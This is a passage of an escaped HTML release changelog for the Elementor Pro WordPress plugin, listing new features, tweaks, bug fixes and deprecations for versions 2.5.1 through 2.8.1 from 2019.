href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9928\\\">#9928<\\/a>)<\\/li>\\n<li>Fix: Draft Popup shows up in Dynamic tag dropdown<\\/li>\\n<\\/ul>\\n<h4>2.8.1 - 2019-12-18<\\/h4>\\n<ul>\\n<li>Fix: Share Buttons widget not working (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9920\\\">#9920<\\/a>)<\\/li>\\n<li>Fix: Redundant <code><p><\\/code> tags added to Single Template posts<\\/li>\\n<\\/ul>\\n<h4>2.8.0 - 2019-12-18<\\/h4>\\n<ul>\\n<li>New: Table of Contents Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5171\\\">#5171<\\/a>)<\\/li>\\n<li>New: Added Font Awesome Pro Duotone font family support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9578\\\">#9578<\\/a>)<\\/li>\\n<li>Tweak: Added Lazy Load option to Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9763\\\">#9763<\\/a>)<\\/li>\\n<li>Tweak: Added Random order option to Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9269\\\">#9269<\\/a>)<\\/li>\\n<li>Tweak: Updated Font Awesome Pro to v5.11.2 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9578\\\">#9578<\\/a>)<\\/li>\\n<li>Tweak: Added preselect support for multiple default select values in Forms Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9324\\\">#9324<\\/a>)<\\/li>\\n<li>Tweak: Avoid duplicate queries for Custom Icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9579\\\">#9579<\\/a>)<\\/li>\\n<li>Tweak: Major performance improvements to Gallery widget<\\/li>\\n<li>Tweak: Avoid non-existing images in Gallery widget<\\/li>\\n<li>Tweak: Added <code>tabindex<\\/code>, <code>aria-expanded<\\/code>, <code>aria-hidden<\\/code> and <code>role=\\\"navigation\\\"<\\/code> accessibility attributes to Nav Menu widget<\\/li>\\n<li>Tweak: Changed button HTML tag from <code>button<\\/code> to <code>span<\\/code> in Call to Action and Flip Box widgets for better W3C compliance and accessibility<\\/li>\\n<li>Tweak: Removed Google+ from default networks in Share Buttons widget<\\/li>\\n<li>Tweak: Added compatibility for Library Connect<\\/li>\\n<li>Tweak: Added i18n to Toolset date dynamic tag<\\/li>\\n<li>Tweak: Added external link support to Gallery widget<\\/li>\\n<li>Tweak: Changed the link external attributes implementation to use <code>add_link_attributes()<\\/code> in Gallery widget<\\/li>\\n<li>Tweak: Updated references to the new Schemes system location<\\/li>\\n<li>Tweak: Avoid running Gallery handler when the gallery is empty<\\/li>\\n<li>Tweak: UI Tweaks in Editor Panel<\\/li>\\n<li>Tweak: Added responsive capabilities to Pointer Width control in Nav Menu widget<\\/li>\\n<li>Tweak: Added mobile support for responsive controls in Nav Menu widget<\\/li>\\n<li>Tweak: Refactor <code>register_controls()<\\/code> method in Posts widget skin trait<\\/li>\\n<li>Fix: ACF URL "undefined Index" notice (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7646\\\">#7646<\\/a>)<\\/li>\\n<li>Fix: WooCommerce Mini-Cart widget causes fatal error in edge cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9304\\\">#9304<\\/a>)<\\/li>\\n<li>Fix: <code>PHP Notice: Undefined index<\\/code> display for Author query (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9864\\\">#9864<\\/a>)<\\/li>\\n<li>Fix: Added compatibility for Button widget placed inside Swiper carousel (<a href=\\\"https:\\/\\/wordpress.org\\/support\\/topic\\/broken-buttons-since-elementor-2-8\\/\\\">Topic<\\/a>)<\\/li>\\n<li>Fix: Avoid empty spaces in Post info widget<\\/li>\\n<li>Tweak: Always show "Custom label" control in Login widget<\\/li>\\n<li>Fix: Nav Menu item typography selector in Nav Menu widget<\\/li>\\n<li>Fix: Facebook Like Button widget causes flickering<\\/li>\\n<li>Fix: WooCommerce mini-cart behaviour when using <code>plain<\\/code> permalinks format<\\/li>\\n<li>Fix: Avoid running Popup triggers when set without conditions<\\/li>\\n<li>Fix: Removed "Date" query from Products widget<\\/li>\\n<li>Fix: Slides widget when used as a Shortcode and is hidden<\\/li>\\n<li>Fix: Custom URL being accessed on swipe in Media Carousel<\\/li>\\n<li>Fix: Media Carousel widget Cube effect glitch<\\/li>\\n<li>Fix: Lightbox shows images from multiple Gallery widgets in the same page<\\/li>\\n<li>Fix: Image <code>alt<\\/code> Text not displayed on overlay in Gallery widget<\\/li>\\n<li>Fix: Gallery widget not visible in Posts widget Full Content skin<\\/li>\\n<li>Fix: WooCommerce mini-cart remove unnecessary hooks registration when WooCommerce integration set to <code>Disable<\\/code><\\/li>\\n<li>Fix: Slides widget button wrapping breaks in mobile view<\\/li>\\n<li>Fix: Dynamic capabilities with the Reviews widget<\\/li>\\n<li>Fix: Disabling autoplay doesn\'t work in Slides widget<\\/li>\\n<li>Fix: Posts widget Full Content skin not working on Single template<\\/li>\\n<li>Fix: Autocomplete not working for "By Author" condition in Display Conditions screen<\\/li>\\n<li>Fix: Posts widget alignment issue<\\/li>\\n<li>Fix: Product Variations Clear button not working in edge cases<\\/li>\\n<li>Fix: Styling issues in Form widget submit button<\\/li>\\n<\\/ul>\\n<h4>2.7.3 - 2019-10-28<\\/h4>\\n<ul>\\n<li>Tweak: Added RTL support to Galleries widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9213\\\">#9213<\\/a>)<\\/li>\\n<li>Tweak: Added Custom Icons compatibility for WordPress 5.3<\\/li>\\n<li>Fix: Missing template function declaration causes fatal error in WC mini-cart widget<\\/li>\\n<li>Fix: Pause on hover doesn\'t work in Carousel widgets<\\/li>\\n<li>Fix: Link-actions conflict with <code>?action=<\\/code> parameter in the URL<\\/li>\\n<li>Fix: Lightbox navigation not working in Gallery widget Single mode<\\/li>\\n<li>Fix: Ken burns effect not working on the 1st slide if Infinite Loop option is turned off in Carousel widgets<\\/li>\\n<li>Fix: Popup Advanced Rules detects internal links as external if current URL starts with <code>www<\\/code><\\/li>\\n<\\/ul>\\n<h4>2.7.2 - 2019-10-06<\\/h4>\\n<ul>\\n<li>Fix: Slide Overlay not working when applying Ken burns effect in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9209\\\">#9209<\\/a>)<\\/li>\\n<li>Fix: Content width glitch in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9180\\\">#9180<\\/a>)<\\/li>\\n<li>Fix: Horizontal Alignment not working when applying custom style per slide in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9180\\\">#9180<\\/a>)<\\/li>\\n<li>Fix: Missing semicolon in Custom Fonts <code>font-display<\\/code> CSS<\\/li>\\n<\\/ul>\\n<h4>2.7.1 - 2019-09-26<\\/h4>\\n<ul>\\n<li>Fix: Background Overlay layer is over the slide content in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9180\\\">#9180<\\/a>)<\\/li>\\n<li>Fix: Duplicate images under "All" filter in Multiple Gallery<\\/li>\\n<\\/ul>\\n<h4>2.7.0 - 2019-09-24<\\/h4>\\n<ul>\\n<li>New: Enhanced Galleries widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1898\\\">#1898<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3103\\\">#3103<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4279\\\">#4279<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7631\\\">#7631<\\/a>)<\\/li>\\n<li>New: Dynamic Number (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5952\\\">#5952<\\/a>)<\\/li>\\n<li>New: Full content skin for Posts and Archive-posts widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4617\\\">#4617<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic number capability to Price List, Price Table, Counter, Star Rating, Progress Bar widgets<\\/li>\\n<li>Tweak: Added tags support to forms Mailchimp action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5418\\\">#5418<\\/a>)<\\/li>\\n<li>Tweak: User Profile Picture Dynamic Tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7947\\\">#7947<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8740\\\">#8740<\\/a>)<\\/li>\\n<li>Tweak: Added <code>font-display<\\/code> support to custom fonts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5993\\\">#5993<\\/a>, <a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-pro-2-7-custom-fonts-font-display-support\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added Text Shadow control to Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8800\\\">#8800<\\/a>)<\\/li>\\n<li>Tweak: Added Re-subscribe support to MailerLite (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8799\\\">#8799<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities to Facebook Embed widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9030\\\">#9030<\\/a>)<\\/li>\\n<li>Tweak: Use <code>swiper.js<\\/code> instead of <code>slick.js<\\/code> in Slides widget (<a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-2-7-moving-sliders-from-slick-to-swiper\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/search_form\\/before_input<\\/code> action hook to Search Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5598\\\">#5598<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/search_form\\/after_input<\\/code> action hook to Search Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5598\\\">#5598<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic support for Custom field key (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7789\\\">#7789<\\/a>)<\\/li>\\n<li>Tweak: Increased expired license notice bar frequency<\\/li>\\n<li>Tweak: Changed the icon name of Slides widget<\\/li>\\n<li>Tweak: Added designated Finder\'s Icons for Custom icons & Custom fonts<\\/li>\\n<li>Tweak: Use Ken Burns Effect as an external module<\\/li>\\n<li>Tweak: Remove Fontello conflicting CSS on import to Custom Icons sets<\\/li>\\n<li>Tweak: Editor Panel UI tweaks<\\/li>\\n<li>Tweak: Added DOM events on Popup show\\/hide (<a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-pro-2-7-popup-events\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added option to change the variations field width in Add to Cart widget<\\/li>\\n<li>Tweak: Use select control instead of select2 in Menu Cart widget<\\/li>\\n<li>Tweak: Added conditions to the tabs instead of to each control in Share Buttons widget<\\/li>\\n<li>Tweak: Added Typography controls to HTML field in Forms widget<\\/li>\\n<li>Tweak: Allow edit selected Font file in Custom Font<\\/li>\\n<li>Tweak: Changed reCAPTCHA v3 error message<\\/li>\\n<li>Tweak: Remove the "Save as Global" option on Global widget context menu<\\/li>\\n<li>Fix: Corrected selector for <code>removeControlSpinner()<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8790\\\">#8790<\\/a>)<\\/li>\\n<li>Fix: Slides widget navigation icons misplacement (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8533\\\">#8533<\\/a>)<\\/li>\\n<li>Fix: Horizontal Scrollbar when Slider widget is set to Full Width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8527\\\">#8527<\\/a>)<\\/li>\\n<li>Fix: Inconsistent behavior when "Infinite Loop" enabled with "Autoplay" in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6726\\\">#6726<\\/a>)<\\/li>\\n<li>Fix: Ken Burns effect on Chrome transition glitches (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1671\\\">#1671<\\/a>)<\\/li>\\n<li>Fix: Nothing found message shows up inside the columns set in Posts Archive widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7347\\\">#7347<\\/a>)<\\/li>\\n<li>Fix: Responsive UI glitch in Popup Conditions modal tabs<\\/li>\\n<li>Fix: Removed unnecessary divider in Call to Action widget<\\/li>\\n<li>Fix: Custom Add To Cart * button style (size, position and background color) when <code>quantity<\\/code> is enabled.<\\/li>\\n<li>Fix: Add support for Document\\/PageBase in Theme Builder (Core >=2.7.0)<\\/li>\\n<li>Fix: Ampersand character breaks email link in Share Buttons widget<\\/li>\\n<li>Fix: Correct custom font attachment <code>mime-type<\\/code> to show uploaded Custom Fonts<\\/li>\\n<li>Fix: Mini-Cart not refreshing in Menu Cart widget<\\/li>\\n<li>Fix: Cart drawer not working when WC Subscriptions plugin is activated<\\/li>\\n<li>Fix: Querying CPT with custom taxonomies does not show the taxonomies before saving<\\/li>\\n<li>Fix: Double rendering on change caused console error in Theme Builder\'s conditions screen<\\/li>\\n<li>Fix: Translations and Strings in Share Buttons widget<\\/li>\\n<li>Fix: Avoid using offset if the source is Manual selection in Query Control<\\/li>\\n<li>Fix: Form being submitted although reCAPTCHA v3 validation failed in Forms widget<\\/li>\\n<\\/ul>\\n<h4>2.6.5 - 2019-08-26<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.7<\\/li>\\n<li>Fix: Button style not working when <code>quantity<\\/code> is enabled in Custom Add To Cart widget<\\/li>\\n<li>Fix: Updated minified JS file fixed WhatsApp base URL in Share Buttons widget<\\/li>\\n<\\/ul>\\n<h4>2.6.4 - 2019-08-21<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.7<\\/li>\\n<li>Fix: Changed WhatsApp base URL in Share Buttons widget for cross-device compatibility<\\/li>\\n<li>Fix: Random slides order after several clicks on pagination in Testimonial Carousel widget<\\/li>\\n<\\/ul>\\n<h4>2.6.3 - 2019-08-18<\\/h4>\\n<ul>\\n<li>Fix: Core version rollback to <code>>2.6.0<\\/code> causes a fatal error<\\/li>\\n<li>Fix: Duplicate images when slideshow skin is selected in Media Carousel lightbox<\\/li>\\n<li>Fix: Default bottom margin added to reCAPTCHA V3 badge<\\/li>\\n<li>Fix: Input glitch in reCAPTCHA V3 threshold settings<\\/li>\\n<\\/ul>\\n<h4>2.6.2 - 2019-07-30<\\/h4>\\n<ul>\\n<li>Tweak: Better accessibility support in Search Form widget<\\/li>\\n<li>Fix: UI glitched in Popup publish screen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8616\\\">#8616<\\/a>)<\\/li>\\n<li>Fix: "Child of Term" and "Any child of term" conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8695\\\">#8695<\\/a>)<\\/li>\\n<li>Fix: Restored <code>library_widget_templates<\\/code> action hook for 3rd party compatibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8687\\\">#8687<\\/a>)<\\/li>\\n<li>Fix: Twitter Icon missing in Blockquote widget<\\/li>\\n<li>Fix: Form reCAPTCHA v3 badge position not working<\\/li>\\n<li>Fix: Renewal notice bar appears in wrong situations<\\/li>\\n<li>Fix: Draft Icon Set loads empty Icon Library<\\/li>\\n<\\/ul>\\n<h4>2.6.1 - 2019-07-24<\\/h4>\\n<ul>\\n<li>Fix: Query Control autocomplete not retrieving results (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8672\\\">#8672<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8661\\\">#8661<\\/a>)<\\/li>\\n<li>Fix: Price Table features section not working (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8660\\\">#8660<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.6.0 - 2019-07-23<\\/h4>\\n<ul>\\n<li>New: Introducing Custom Icon sets - including Fontello, IcoMoon and Fontastic support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/110\\\">#110<\\/a>)<\\/li>\\n<li>New: Added Font Awesome 5 Pro integration including 5,300+ icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4430\\\">#4430<\\/a>)<\\/li>\\n<li>New: Added reCAPTCHA v3 integration to Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8213\\\">#8213<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6039\\\">#6039<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7165\\\">#7165<\\/a>)<\\/li>\\n<li>Tweak: Added Exit Animation for Popups (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7063\\\">#7063<\\/a>)<\\/li>\\n<li>Tweak: Added ACF Dynamic tag support for archive pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5147\\\">#5147<\\/a>)<\\/li>\\n<li>Tweak: Added Navigator Indicators for Custom CSS & Motion Effects (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2180\\\">#2180<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities for Form Redirect action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7552\\\">#7552<\\/a>)<\\/li>\\n<li>Tweak: Added Logged In Message styling options for Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7928\\\">#7928<\\/a>)<\\/li>\\n<li>Tweak: Added <code>none<\\/code> breakpoint option to Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7916\\\">#7916<\\/a>)<\\/li>\\n<li>Tweak: Added option to place Post Terms dynamic tag without links (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8366\\\">#8366<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor\\/query\\/query_results<\\/code> hook to Query Control to allow full control over results (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7912\\\">#7912<\\/a>)<\\/li>\\n<li>Tweak: Allow choosing Heading HTML tag in Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8090\\\">#8090<\\/a>)<\\/li>\\n<li>Tweak: Show popup on dynamic click even when <code>Avoid Multiple Popups<\\/code> option is selected (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8189\\\">#8189<\\/a>)<\\/li>\\n<li>Tweak: Added condition option to all of archive child pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8256\\\">#8256<\\/a>)<\\/li>\\n<li>Tweak: Added <code>Effects Relative To<\\/code> control to Scrolling Effects<\\/li>\\n<li>Tweak: Allow shortcodes in HTML Form field<\\/li>\\n<li>Tweak: Removed donReach integration from Share Buttons widget due to service inconsistent stability<\\/li>\\n<li>Tweak: Changed MailChimp <code>List<\\/code> label to <code>Audience<\\/code><\\/li>\\n<li>Tweak: Improved Entrance and Exit animation behavior in Popup<\\/li>\\n<li>Tweak: Added <code>Deprecated Notice<\\/code> control to <code>Archive Products<\\/code> and <code>Woo Products<\\/code> widgets<\\/li>\\n<li>Tweak: Added default dynamic title for archives in Theme Builder<\\/li>\\n<li>Tweak: Added condition to show <code>Centered Slides<\\/code> control in Media Carousel widget<\\/li>\\n<li>Tweak: Added notice bar in the Editor when the license is expired or not activated<\\/li>\\n<li>Tweak: Replaced <code>select<\\/code> control with <code>choose<\\/code> control in Price List widget<\\/li>\\n<li>Tweak: Removed Font Awesome 4 dependencies from the Editor<\\/li>\\n<li>Tweak: Minor styling tweaks in the Popup publish modal<\\/li>\\n<li>Tweak: Hide ordering form in Products widget on front page<\\/li>\\n<li>Tweak: Removed page title markup when \'Hide Title\' is active<\\/li>\\n<li>Tweak: Added style controls for HTML field in Form widget<\\/li>\\n<li>Fix: Form widget Date picker makes the Popup builder disappear (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7240\\\">#7240<\\/a>)<\\/li>\\n<li>Fix: Sticky element stop point stops working on viewport resize (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7884\\\">#7884<\\/a>)<\\/li>\\n<li>Fix: Copy-Paste style not pasting the Pointer option in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8497\\\">#8497<\\/a>)<\\/li>\\n<li>Fix: Missing Print icon in Share Buttons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8506\\\">#8506<\\/a>)<\\/li>\\n<li>Fix: UI style glitch in Blockquote widget when viewing from iPad<\\/li>\\n<li>Deprecated: <code>DB::save_editor()<\\/code> - Remove usage of this method (<a href=\\\"https:\\/\\/developers.elementor.com\\/v2-6-0-planned-deprecations\\/\\\">Deprecation Post<\\/a>)<\\/li>\\n<li>Deprecated: <code>DB::get_plain_editor()<\\/code> - Remove usage of this method (<a href=\\\"https:\\/\\/developers.elementor.com\\/v2-6-0-planned-deprecations\\/\\\">Deprecation Post<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.14 - 2019-07-14<\\/h4>\\n<ul>\\n<li>Fix: Better WC Related Product grid support to various themes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8555\\\">#8555<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.13 - 2019-07-11<\\/h4>\\n<ul>\\n<li>Fix: Better WC grid support to various themes<\\/li>\\n<\\/ul>\\n<h4>2.5.12 - 2019-07-10<\\/h4>\\n<ul>\\n<li>Fix: Grid for WooCommerce Archive Product widget<\\/li>\\n<li>Fix: Remove redundant <code>whitespace<\\/code> CSS property causes style glitch in iPad<\\/li>\\n<li>Tweak: Added more compatibility for Elementor v2.6<\\/li>\\n<\\/ul>\\n<h4>2.5.11 - 2019-07-02<\\/h4>\\n<ul>\\n<li>Fix: Close icon missing from Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8460\\\">#8460<\\/a>)<\\/li>\\n<li>Fix: Elementor Pro v2.5.10 shows PHP notice regarding notice bar (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8461\\\">#8461<\\/a>)<\\/li>\\n<li>Fix: Fatal error when deleting used Pods fields (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8396\\\">#8396<\\/a>)<\\/li>\\n<li>Fix: Missing dropdown icon in conditions screen<\\/li>\\n<\\/ul>\\n<h4>2.5.10 - 2019-05-28<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.6<\\/li>\\n<li>Tweak: Error caused by empty Rows & Columns values in Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8261\\\">#8261<\\/a>)<\\/li>\\n<li>Fix: Do not unset <code>product<\\/code> CPT if it\'s not from WooCommerce (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8160\\\">#8160<\\/a>)<\\/li>\\n<li>Fix: Column Spacing not working in WooCommerce Archive Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8285\\\">#8285<\\/a>)<\\/li>\\n<li>Fix: Title styling not working in Products Categories widget<\\/li>\\n<li>Fix: Empty value in Dynamic Pods Gallery dropdown using Safari browser<\\/li>\\n<li>Fix: WooCommerce archives included in "All Archives" condition<\\/li>\\n<\\/ul>\\n<h4>2.5.9 - 2019-05-28<\\/h4>\\n<ul>\\n<li>Tweak: Removed <code>auto-confirm<\\/code> control from MailPoet to support new version of MailPoet<\\/li>\\n<li>Fix: Multiple Custom Fonts not rendered in the editor<\\/li>\\n<li>Fix: Products <code>sale<\\/code> query - handle exclude by manual selection.<\\/li>\\n<li>Fix: Product Categories grid row & column style<\\/li>\\n<li>Fix: Form integration AJAX cache override<\\/li>\\n<li>Fix: Removed redundant CSS on Canvas & Header-Footer page templates<\\/li>\\n<\\/ul>\\n<h4>2.5.8 - 2019-05-06<\\/h4>\\n<ul>\\n<li>Fix: Popup entrance animation not working in frontend<\\/li>\\n<li>Fix: Popup Exit Intent trigger activated multiple times<\\/li>\\n<\\/ul>\\n<h4>2.5.7 - 2019-05-05<\\/h4>\\n<ul>\\n<li>Fix: Embedded video keeps playing after a Popup is closed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7875\\\">#7875<\\/a>)<\\/li>\\n<li>Fix: Maximum call stack size exceeded error in Safari (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7824\\\">#7824<\\/a>)<\\/li>\\n<li>Fix: Entrance animations not appearing on Popup reopen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7395\\\">#7395<\\/a>)<\\/li>\\n<li>Fix: WC variations select style glitch in several themes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8008\\\">#8008<\\/a>)<\\/li>\\n<li>Fix: Theme Builder taxonomy conditions not retrieving proper results in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.5.6 - 2019-04-29<\\/h4>\\n<ul>\\n<li>Tweak: Removed <code>Shortcode<\\/code> dynamic from Image, Gallery and Media control<\\/li>\\n<li>Fix: Popup not inheriting entrance animation in responsive mode (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7809\\\">#7809<\\/a>)<\\/li>\\n<li>Fix: Terms autocomplete retrieves wrong results in Query Control<\\/li>\\n<li>Fix: Query Control Related by author glitches in edge cases<\\/li>\\n<li>Fix: Query Control using terms for Products widget<\\/li>\\n<li>Fix: Posts cards style glitch in small screens<\\/li>\\n<li>Fix: Display conditions delete icon missing in small screens<\\/li>\\n<li>Fix: Avoid rendering Menu Cart widget in WordPress native editor<\\/li>\\n<\\/ul>\\n<h4>2.5.5 - 2019-04-08<\\/h4>\\n<ul>\\n<li>Tweak: Allow text selection inside a Popup<\\/li>\\n<li>Fix: Added backwards compatibility for <code>tax_query<\\/code> in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7751\\\">#7751<\\/a>)<\\/li>\\n<li>Fix: Missing arguments for <code>widget_title<\\/code> filter (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7745\\\">#7745<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.4 - 2019-04-03<\\/h4>\\n<ul>\\n<li>Fix: Move Query from using <code>term_id<\\/code> to <code>term_taxonomy_id<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7653\\\">#7653<\\/a>)<\\/li>\\n<li>Fix: Offset manipulation hook removal in Query control<\\/li>\\n<li>Fix: Missing form field <code>ID<\\/code> in some edge cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7711\\\">#7711<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7660\\\">#7660<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.3 - 2019-03-31<\\/h4>\\n<ul>\\n<li>Tweak: Updated Google Calendar dynamic tag URL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7673\\\">#7673<\\/a>)<\\/li>\\n<li>Fix: Missing form field names (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7651\\\">#7651<\\/a>)<\\/li>\\n<li>Fix: PHP 5.4 backward compatibility in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7633\\\">#7633<\\/a>)<\\/li>\\n<li>Fix: <code>products_deprecated<\\/code> Query Control module compatibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7654\\\">#7654<\\/a>)<\\/li>\\n<li>Fix: Changed query method from <code>term_id<\\/code> to <code>term_taxonomy_id<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7653\\\">#7653<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.2 - 2019-03-27<\\/h4>\\n<ul>\\n<li>Fix: Overwrite parent widget type in Global Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7632\\\">#7632<\\/a>)<\\/li>\\n<li>Fix: Avoid Duplicates option not working in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7635\\\">#7635<\\/a>)<\\/li>\\n<li>Fix: Manual Selection option not working in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7634\\\">#7634<\\/a>)<\\/li>\\n<li>Fix: Incorrect condition caused handlers issues inside popup<\\/li>\\n<\\/ul>\\n<h4>2.5.1 - 2019-03-26<\\/h4>\\n<ul>\\n<li>Fix: Query Control invalid call to deprecated action (<a 